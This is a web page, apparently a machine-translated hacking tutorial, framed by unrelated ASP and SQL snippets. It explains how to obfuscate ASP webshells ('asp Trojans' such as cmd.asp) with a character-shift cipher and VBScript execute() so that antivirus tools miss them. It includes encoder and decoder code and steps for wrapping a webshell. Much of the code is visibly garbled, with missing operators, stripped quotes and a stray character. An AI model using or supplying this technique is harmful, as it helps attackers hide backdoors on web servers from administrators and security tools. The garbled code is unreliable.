Recommended: Use ASP to block IP to prevent fixed IP spam messages The following is the referenced content: <%Dim IP,IPString,VisitIP'The IP address to be prohibited IPString=|195.225.177.34|195.225.177.137|72.232.250.10|&qu
I remember that when the asp Trojan came out, it was claimed that it would never be killed. Haha, to this day, any antivirus software can kill it without leaving any armor^_^ Haha, due to the idea of changing the shell to avoid antivirus software, we can also shell the asp Trojan (haha, of course not using UPX, etc.). What are you waiting for? Please read down.
In fact, this idea is very simple, which is to encode the asp code and then decode it when executed. There are two methods here, one is to use Microsoft's tool Script Encoder; the other is to use asp's execute function.
Let’s talk about Script Encoder first. This thing can be downloaded for free on the Microsoft official website, and there are also detailed instructions for use, so I won’t talk about it here. However, the file encrypted after it will be <%@ LANGUAGE = VBScript.Encode %>. Haha, I'm showing my fault. The administrator will know that the asp file is encrypted when he sees this sentence. Then how to decrypt it? Here is a decryption software (》) Click to download "). Now that we know, Microsoft's Script Encoder is not safe, so we have to write a program to add the shell.
Asp's execute function is used to execute strings, that is, the asp statement can be written as a string and then executed with execute. For example, this line of code: execute(response.write(hackerXfiles)), the effect after execution is equivalent to execution response.write(hackerXfiles). Here, since the execute function is a string, you need to write double quotation marks when you encounter it. Haha, since execute is a string, we can use the contents inside to encrypt.
How to encrypt? Haha, just use the simplest shift method. Please see the code:
but=1
cc=replace(nr,vbcrlf,hu)
for i= 1 to len(cc)
if mid(cc,i,1)<>Huthen
pk=asc(mid(cc,i,1)) but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk 95
end if
temp=temp&chr(pk)
else
temp=temp&小
end if
next
temp=replace(temp,,)
response.write(temp)
This code is the cyclic shift method under Asp. That variable but is the number of shifted bits, which can be modified. Haha, what is it called a loop? Because the program compares the ascii code of the characters, it will be processed when it is greater than 126 or less than 32, making the range between 32 and 126. Because this can avoid characters that cannot be displayed in Windows. This is also the reason why the carriage return line breaks were replaced from the beginning. Here I wrote a shift encryption asp program xor.asp attached, I hope it will be helpful to you.
Then let's take a look at the result of encrypting response.write(hackerXfiles) with the above code: sftqpotf/xsjuf)#ibdlfsYgjmft#*, hehe, this time the gods can't understand it, ^_^
Since you have added the password, of course you have to decrypt it. See the decryption code:
function UnEncode(temp)
but=1 'This is the number of bits shifted by the shift method! Note that the modification here is consistent with the encryption used
for i =1 to len(temp)
if mid(temp,i,1)<>Huthen
pk=asc(mid(temp,i,1))-but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk 95
end if
a=a&chr(pk)
else
a=a&vbcrlf
end if
next
UnEncode=a
end function
Haha, now I know how to execute it. Just call this decryption function: execute(UnEncode(sftqpotf/xsjuf)#ibdlfsYgjmft#*)), how, is it executed smoothly!
Here I will give you a demonstration so that everyone can understand how to encrypt the asp Trojan. Because there are too many Asp Trojan codes in Ocean and I am lazy, so I can use the short and concise cmd.asp to demonstrate!
First run the xor.asp I wrote, then open cmd.asp with notepad, copy its asp code part to the text box of xor.asp, fill in the shift parameters (I used 1 here), click the conversion, haha, and the result is out. Then create a new text document, copy the content of cmd.asp, and add the content of the previous UnEncode function (here you need to note that modifying the value of the variable but in the UnEncode function is consistent with the shift parameter value selected during encryption), and then replace its asp part with the form of execute(UnEncode(hu)), where hu is assigned with the encryption result obtained in the previous step. Haha, then save it as an asp file and it's OK! Let me talk a few more words here. If the code is relatively long, it can be divided into several parts to encrypt, and then execute with a few more executions. However, be careful to ensure the integrity of the asp code, that is, the associated code such as if and end if cannot be divided into two executes.
Take a look, it can also run!
Share: How to write SQL statements that query all records that have no value in a certain field? Sometimes we need to query all records that have no value in a certain field. Should we use rs(xx)= or IsNull(rs(xx))? To draw a conclusion, we have to start from the beginning: Under what circumstances will there be no value in the field? Because this and